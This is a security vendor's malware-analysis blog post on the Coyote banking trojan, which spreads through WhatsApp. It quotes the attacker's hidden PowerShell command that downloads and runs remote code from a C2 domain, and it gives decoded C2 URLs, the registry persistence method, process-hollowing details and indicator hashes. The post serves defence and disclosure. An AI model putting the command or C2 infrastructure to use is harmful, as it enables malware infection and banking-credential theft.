SPEAK WITH AN EXPERT

Coyote Banking Trojan Extends Reach & Targets Users through WhatsApp

CyberProof Research Team | February 12, 2025 | 7 minute read

Contributors: Niranjan Jayanand & Prajeesh Sureshkumar

Executive Summary 

On 28 Jan 2025, CyberProof SOC Team and Threat Hunters responded to an incident involving a suspicious file download spotted through the messaging application WhatsApp. After investigation we documented similarities consistent with the previously identified Coyote Banking Trojan. Coyote Malware, just like other infostealers, relies on malicious loaders for their quick deployment in mass campaigns, which we have highlighted in an earlier Infostealers blog.

We will continue to monitor this campaign and will provide updates on any additional activities or changes in tactics, techniques, and procedures (TTPs) used by these cyber criminals.

Technical Details

Coyote Malware is a multistage banking trojan programmed to financial services institutions, that targeted more than 60 banking institutions based in Brazil when it was first reported in 2024.

We can confirm that Coyote has recently undergone an update to target over 1000 corporate websites owned by hotels, trading, and financial institutions. Below we will share our observations on the TTPs connected to this campaign.   

The malicious zip archive:

Screenshot of a security alert detailing the creation of a file from a URL, potentially linked to the Coyote Banking Trojan. Event time is January 28, 2025, with action type FileHasMotW. Users are advised to remain vigilant and report any suspicious activity via WhatsApp or email.

File Name : ItauComprovante-26845.228.zip
SHA1 : 50dddec2d6e12fb6611b00783f3127fb607ded0b.

The malicious zip archive contained a shortcut file ( LNK) that connects to a remote c2 server abusing powershell as shown below:

Screenshot showing a security alert for a malicious file event involving "explorer.exe" and a LNK file "ItauComprovante-37543-8851.pdf.lnk" on January 28, 2022. The alert indicates the presence of the Coyote Banking Trojan, which targets users via WhatsApp links.

File name : ItauComprovante-37543-8851.pdf.lnk
SHA1: ec4ac133446675dae167ebc13414740a7d5c7686
SHA256: af8edf888380fe75052aa361dee72bb6a77c96c78e1e3983baff87caeb269f9e
Path: C:\Users\user name \AppData\Local\Temp\b819a344-db95-4e26-a3ae-3aaf6f0d0563_ItauComprovante-26845.228.zip.563\ItauComprovante-37543-8851.pdf.lnk

The infection starts with the lnk file executing of the below powershell script to connect to remove C2 to execute the next stage as shown below:

 “powershell.exe” -w hid -noni -ep Bypass -c “Start-Job -Name UBZAL -ScriptBlock { IEX (iwr -Uri ‘https://iseonu.pinkeosemrabo.com/rtewadrugwexf’ -UseBasicParsing).Content }; Start-Sleep 127”

This leads to download and execution of a DLL loader. Defender alerted of the DLL loader TtDTBrMa6Hjdmk (MD5: 9510dc5e18d3b0b79025b69d6fca0dc4) that injects its malicious code into a process it selects using the Process Hollowing technique.

Below are the list of processes it checks through before selecting one:

  • aspnet_regsql
  •  aspnet_compiler
  •  RegAsm
  •  ilasm
  •  AppLaunch
  •  csc
  •  InstallUtil
  •  ngentask
Screenshot of a security alert highlighting possible code injection by powershell.exe into lsass.exe using CreateRemoteThread API, potentially linked to Coyote malware, shown in a list of related malicious activities.

Fig: Process injection into ilasm.exe

Close-up of a block of C# code with three red arrows highlighting specific lines, including calls to VirtualAllocEx and WriteProcessMemory functions, often utilized in Coyote Malware scripts.

Fig: Code snippet showing different APIs called for Process Injection 

This injected code leverages Donut to decrypt and construct the next level MSIL payload:

Screenshot of code with annotations highlighting registry key check, C2 URL, persistence details, and function related to reading shellcode from the .rsrc section, resembling techniques seen in how the Coyote Banking Trojan targets users via platforms like WhatsApp.

It then creates persistence through the RUN key with a random value name as shown below:

A screenshot reveals a registry key in Windows using a PowerShell command, pinpointing the key path, value name, and data. Alongside MITRE techniques T1547 and T1112, this method resembles tactics used by threats like the Coyote Banking Trojan that targets users.

Decoded base64 is: https://glup.pinkeosemrabo.com/txqmxfcfnmcld

If PowerShell entry is found in the RUN key, it removes and creates another one with a new random value name as shown below:

The registry editor window displays a key hive linked to startup folder modifications, which includes an encoded PowerShell command for downloading a script associated with the Coyote Banking Trojan.

The above base64 blob decodes to: https://glup.pinkeosemrabo.com/ffeffsawjedauwjltajwi.

This decrypted MSIL payload is the Coyote banking trojan which is programmed to target over 1000 websites by monitoring active windows. Coyote also checks usernames, virtual environments, and user machine information:

Snippet of obfuscated code mentioning the domains eurosouthotel.com.br, evolution-hotels.com, and exoticaboutiquehotel.com.br, which targets users by leveraging platforms like WhatsApp to deploy threats such as the Coyote Banking Trojan.

Fig: Coyote Malware website targets

The Coyote Malware’s active monitoring of Windows checks for targeted websites, and if encountered makes contact with attacker C2. The response length will determine the type of attack methods used, which can include screenshot capturing, killing of targeted processes, display setting manipulation, keylogging, etc.

Indicators of Compromise 

7051a7cceac695e3cf2bf874a212980b
9510dc5e18d3b0b79025b69d6fca0dc4
7051a7cceac695e3cf2bf874a212980b
8efe42fa35e5c9907676f1fe09440d43
415a0361b19f7032ac4497bc1d839b4d
2290ac216a3411631fe617f14cad438c
36584f3a7d7706575b6f4e19f751bece
5ab1a69b3fe8007eb9c5d59f16d3b75a
42091491286037f7df3d354e40c76f41
8df0279838998fc836953d3832b84b94
2f589cd8effef61c3852387cfc5146e2
5aa83ba1a6056175af330580cbbd1b95
712347d7f6b59e651e908018cdafaaa9
ec57ece7020b5acac4d0979eadee213a
728a8bee213eb6654e922948033794b6
43650672f75a7fabde4cbba5f76fdc72
e2b06e7435cfa09718baf989e06fbe7c
5d2d250d2715ab8254e2add3f4ba35a9
311a86f21a0edf4b7ee5641e9319953b
beeeb2256924200488b55e073ab6141c
658b3b13b568c887843e6fb25d784cc0
717d47c607c5cc0e8ec99db7c4c1bb3e
21ce45bdc58284396d705bb27c9388f6
4ddf9d8b5eb85ad80111d8de9336ee79
217525db426cb36414da125eff4ff99a
827570b620bfae526d3652ab77a061bb
f225e61ee6339cc7c26a79e732f7dbb1
0fc88e42cff224c203b1a62f69b4a06d
4b5fe461b3b71fe8f40a06f26bbad7bb
bb278737484d96cb34326387104c65fb
f8048b69219f99ec3861ba01a96221e6
d979b74d918e1463b7c254c4ba56d5b2
16349043b989d2818fe6eeed340a5370
29dda050b923ef18441ef9a872074d40
49d0ee2f2e5d65479ad15ce1f3f55975
7dcb59c3422b2f4e78d5da8b08aeb366
8f7e25ebf3ec4831ad4678949201e64f
3609507fcf43d779097a046c83c670d8
6d274f2b804cf1665c6c5bd172897323
a6becfe1cc88dd1ed8b332b046a4575d
25f2fd25a573605d99647cc2385ecde7
092e6392ee524ca939a1194017e2a081
8a52ef52abc98e8e0f9d886b13bb1968
85f3893f8659be10b4638f2dd816b614
f53673883d269e6da7a1f958e95c04e4
cb03bc00d72d228a6007ef9af1abc6fb
2373840f3d12e4c7df5c2ad533063d8b
62d054f89c607d249beb9f96fd519ba6
b96dbc004fac940ce8a5893d976e5e19
0936325ee6089f70990f9ac1d57bb5ea
eb059d0bee5e40855991604e825343da
0d47c6fab68d828f38226d42ea8e9aee
916a6a49a3764d55b4cf17ace81fbfe3
a67b9505321d2d71a29d2b55eac38c5e
4a84bff8a7ec009e9e3b3dea5f2f6a69
cfea1713e83878bb0f96812075222a4f
a0b3659164ed5d8c37a1a9cdcff74e23
fc8ebf8a036f6b7d0b5a5596a96b224e
83168a9981f269881d6dcad2531165b2
4d0d55a9c5e6796fb7978f79e0c02f02
e636c228e51a310a86de7d398acd0857
63350e6a4282adb2706bf6b43f49e5b4
28338d4900e0caafa1a1a785538ec343
c0ea4cbebe069f013e4e67e0a5a7e6b7
6f19708f6fe6cd3369d5f76640d4902c
51ab64800e30a9a81ae394ce353e1f51
730d3cbff64a82d9e44e2a13de831246

Conclusion

Brazil is well known for being targeted by malicious banking trojans and POS malware. The ease with which different lolbins and malicious loaders are used in both opportunistic and targeted attacks makes organizations in Brazil and other developing nations a primary target for cybercriminals. This also makes way for high-volume, polymorphic samples to be used in each campaign helping cybercriminals to stay under the radar for a longer period of time.

We also expect Coyote to undergo further updates to evade detections and to target more websites in the near future. The CyberProof Threat Research Team will continue to work round the clock protecting and notifying customers and the public of these evolving threats.

Recommendations

We recommend the following to safeguard against these threats:

  • Invest in Employee Training: Employees are often the first line of defense against cyber threats. Training staff to recognize phishing emails, suspicious links, and other common attack vectors is critical. Regularly updated cybersecurity training programs ensure employees stay aware of evolving threats and adhere to best practices.
  • Access Controls: Restrict access to social networking webpages and applications.
  • Leverage Advanced Platforms: Modern threat detection platforms equipped with real-time monitoring, AI-driven threat intelligence, and automated response mechanisms are indispensable. These tools enable organizations to detect and neutralize threats swiftly, minimizing potential damage.

How CyberProof Can Help

As cyber threats continue to evolve, so too must the strategies and technologies used to combat them. Threat detection is a critical component of any organization’s cybersecurity strategy. Learn how CyberProof can help your organization effectively detect and respond to cyber threats.

Recommended Posts
APT
Crypto & social engineering: North Korean APTs in 2024
Written by CyberProof Research Team

Our Cyber Research Team is always on the lookout for the latest threats facing the digital ecosystem. Stay ahead of the risks so you don't need to find out about them after they become your next attackers.